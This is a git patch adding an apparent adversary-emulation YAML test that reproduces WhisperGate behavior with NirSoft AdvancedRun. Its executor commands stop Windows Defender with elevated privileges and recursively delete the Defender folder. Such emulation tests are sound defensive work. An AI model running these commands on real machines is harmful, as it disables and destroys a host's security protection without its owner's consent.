From 8cfb6beafc859b92827d7a42fb9b8b03ba7dde92 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Fri, 21 Jan 2022 11:33:08 -0700
Subject: [PATCH] NIRSoft AdvancedRun (#1735)

* NIRSoft AdvancedRun

* Update T1588.002.yaml

* Update T1588.002.yaml
---
 atomics/T1588.002/T1588.002.yaml | 36 ++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 atomics/T1588.002/T1588.002.yaml

diff --git a/atomics/T1588.002/T1588.002.yaml b/atomics/T1588.002/T1588.002.yaml
new file mode 100644
index 00000000..d11cac47
--- /dev/null
+++ b/atomics/T1588.002/T1588.002.yaml
@@ -0,0 +1,36 @@
+attack_technique: T1588.002
+display_name: 'Obtain Capabilities: Tool'
+atomic_tests:
+- name: Run NirSoft AdvancedRun
+  description: |
+    Information on NirSoft AdvancedRun and it's creators found here: http://www.nirsoft.net/utils/advanced_run.html
+    This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+    Upon successful execution, AdvancedRun.exe will run and stop Defender and attempt to delete the Defender folder on disk. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of AdvancedRun executable
+      type: Path
+      default: PathToAtomicsFolder\T1588.002\bin\AdvancedRun
+    local_executable:
+      description: name of the advancedrun executable
+      type: String
+      default: 'advancedrun.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Advancedrun.exe must be located at #{local_folder}\#{local_executable}
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip"
+        Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
+  executor:
+    command: |
+      #{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
+      #{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore
+    name: powershell
+    elevation_required: true